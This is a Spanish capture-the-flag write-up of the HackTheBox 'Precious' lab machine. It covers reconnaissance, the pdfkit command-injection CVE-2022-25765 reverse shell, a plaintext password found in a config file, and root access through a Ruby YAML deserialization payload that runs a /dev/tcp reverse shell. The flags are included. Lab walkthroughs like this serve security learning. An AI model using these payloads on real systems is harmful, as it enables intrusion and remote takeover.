Precious

Precious Linux · Easy - Adventure mode

🔭 Reconocimiento:

┌──(pmartinezr㉿kali)-[~]
└─$ nmap -p- -Pn -sSVC --min-rate  5000 10.129.228.98
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-05 22:21 CET
Nmap scan report for 10.129.228.98
Host is up (0.045s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
|   3072 84:5e:13:a8:e3:1e:20:66:1d:23:55:50:f6:30:47:d2 (RSA)
|   256 a2:ef:7b:96:65:ce:41:61:c4:67:ee:4e:96:c7:c8:92 (ECDSA)
|_  256 33:05:3d:cd:7a:b7:98:45:82:39:e7:ae:3c:91:a6:58 (ED25519)
80/tcp open  http    nginx 1.18.0
|_http-title: Did not follow redirect to http://precious.htb/
|_http-server-header: nginx/1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.15 seconds

En la web tenemos un formulario para introducir una URL y nos convertirá el contenido de la misma en un PDF.

🔭 Reconocimiento:

┌──(pmartinezr㉿kali)-[~]
└─$ /usr/bin/whatweb http://precious.htb/
http://precious.htb/ [200 OK] Country[RESERVED][ZZ], HTML5, HTTPServer[nginx/1.18.0 + Phusion Passenger(R) 6.0.15], IP[10.129.228.98], Ruby-on-Rails, Title[Convert Web Page to PDF], UncommonHeaders[x-content-type-options], X-Frame-Options[SAMEORIGIN], X-Powered-By[Phusion Passenger(R) 6.0.15], X-XSS-Protection[1; mode=block], nginx[1.18.0]

Usando whatwebpodemos descubrir que está hecho con Ruby-on-rails, esto nos da una pista de por donde buscar

CVE: CVE-2022-25765

💣 Preparación:

https://github.com/lowercasenumbers/CVE-2022-25765

┌──(pmartinezr㉿kali)-[~/htb/precious]
└─$ python cve-2022-25765.py -t http://precious.htb  -l 10.10.14.110 -p 4444
/home/pmartinezr/htb/precious/cve-2022-25765.py:19: SyntaxWarning: invalid escape sequence '\ '
#  / ___\ \   / / ____|   |___ \ / _ \___ \|___ \    |___ \| ___|___  / /_| ___|  _ __  _   _  #
################################################################################################
#  ______     _______     ____   ___ ____  ____      ____  ____ _____ __  ____                 #
#  / ___\ \   / / ____|   |___ \ / _ \___ \|___ \    |___ \| ___|___  / /_| ___|  _ __  _   _  #
# | |    \ \ / /|  _| _____ __) | | | |__) | __) |____ __) |___ \  / / '_ \___ \ | '_ \| | | | #
# | |___  \ V / | |__|_____/ __/| |_| / __/ / __/_____/ __/ ___) |/ /| (_) |__) || |_) | |_| | #
#  \____|  \_/  |_____|   |_____|\___/_____|_____|   |_____|____//_/  \___/____(_) .__/ \__, | #
#                                                                                |_|    |___/  #
#                                                                                              #
# Exploit Title: pdfkit < 0.8.7.2 - Command Injection                                          #
# Exploit Author: lowercasenumbers                                                             #
# Vendor Homepage: https://pdfkit.org/                                                         #
# Software Link: https://github.com/pdfkit/pdfkit                                              #
# Version: < 0.8.7.2                                                                           #
# Tested on: pdfkit 0.8.6                                                                      #
# CVE: CVE-2022–25765                                                                          #
#                                                                                              #
################################################################################################
> Sending Reverse Shell
> Exploit Completed
> Check your netcat listener

👽 Acciones:

msf exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.10.14.110:4444
[*] Command shell session 1 opened (10.10.14.110:4444 -> 10.129.228.98:53972) at 2026-01-06 00:54:30 +0100
shell
[*] Trying to find binary 'python' on the target machine
[-] python not found
[*] Trying to find binary 'python3' on the target machine
[*] Found python3 at /usr/bin/python3
[*] Using `python` to pop up an interactive shell
[*] Trying to find binary 'bash' on the target machine
[*] Found bash at /usr/bin/bash
ruby@precious:/var/www/pdfapp$ whoami
whoami
ruby
ruby@precious:~/.bundle$ cat config
cat config
---
BUNDLE_HTTPS://RUBYGEMS__ORG/: "henry:Q3c1AqGHtoI0aXAYFH"

Al parecer alguien dejó un archivo con la clave de un usuario .bundle/config henry:Q3c1AqGHtoI0aXAYFH

┌──(pmartinezr㉿kali)-[~/htb/precious]
└─$ ssh henry@precious.htb
The authenticity of host 'precious.htb (10.129.228.98)' can't be established.
ED25519 key fingerprint is: SHA256:1WpIxI8qwKmYSRdGtCjweUByFzcn0MSpKgv+AwWRLkU
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'precious.htb' (ED25519) to the list of known hosts.
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
henry@precious.htb's password:
Linux precious 5.10.0-19-amd64 #1 SMP Debian 5.10.149-2 (2022-10-21) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
henry@precious:~$ sudo -l
Matching Defaults entries for henry on precious:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User henry may run the following commands on precious:
(root) NOPASSWD: /usr/bin/ruby /opt/update_dependencies.rb
henry@precious:/opt$ cat /home/henry/user.txt
c8592f5a0251a7f4b6173b15a021d45c

🔭 Reconocimiento:

henry@precious:~$ cat /opt/dependencies.yml
ls /opt/sample -ltr
total 4
-rw-r--r-- 1 root root 26 Sep 22  2022 dependencies.yml

No podemos modificar el archivo dependencies.yml ni el script /opt/update_dependencies.rb

 # Compare installed dependencies with those specified in "dependencies.yml"
require "yaml"
require 'rubygems'
# TODO: update versions automatically
def update_gems()
end
def list_from_file
YAML.load(File.read("dependencies.yml"))
end
def list_local_gems
Gem::Specification.sort_by{ |g| [g.name.downcase, g.version] }.map{|g| [g.name, g.version.to_s]}
end
gems_file = list_from_file
gems_local = list_local_gems
gems_file.each do |file_name, file_version|
gems_local.each do |local_name, local_version|
if(file_name == local_name)
if(file_version != local_version)
puts "Installed version differs from the one specified in file: " + local_name
else
puts "Installed version is equals to the one specified in file: " + local_name
end
end
end
end

Este sería el contenido original del archivo update_dependencies.rb

💣 Preparación:

---
- !ruby/object:Gem::Installer
i: x
- !ruby/object:Gem::SpecFetcher
i: y
- !ruby/object:Gem::Requirement
requirements:
!ruby/object:Gem::Package::TarReader
io: &1 !ruby/object:Net::BufferedIO
io: &1 !ruby/object:Gem::Package::TarReader::Entry
read: 0
header: "abc"
debug_output: &1 !ruby/object:Net::WriteAdapter
socket: &1 !ruby/object:Gem::RequestSet
sets: !ruby/object:Net::WriteAdapter
socket: !ruby/module 'Kernel'
method_id: :system
git_set: "bash -c 'bash -i >& /dev/tcp/10.10.14.110/4444 0>&1'"
method_id: :resolve

Sin embargo si puedo recrear el archivo yml con una revershell y lo colocamos en el /home/henry

🪲 Explotación:

https://github.com/v4resk/red-book/blob/main/redteam/privilege-escalation/linux/script-exploits/ruby.md Aquí está la explicación del exploit.

👽 Acciones:

henry@precious:~$ sudo /usr/bin/ruby /opt/update_dependencies.rb
sh: 1: reading: not found

Lanzamos el script con sudo

┌──(pmartinezr㉿kali)-[~/htb/precious]
└─$ socat TCP-LISTEN:4444 -
root@precious:/home/henry# cat /root/root.txt
cat /root/root.txt
3e08fed0cf427dfcf93ba57cdabe1821

achivement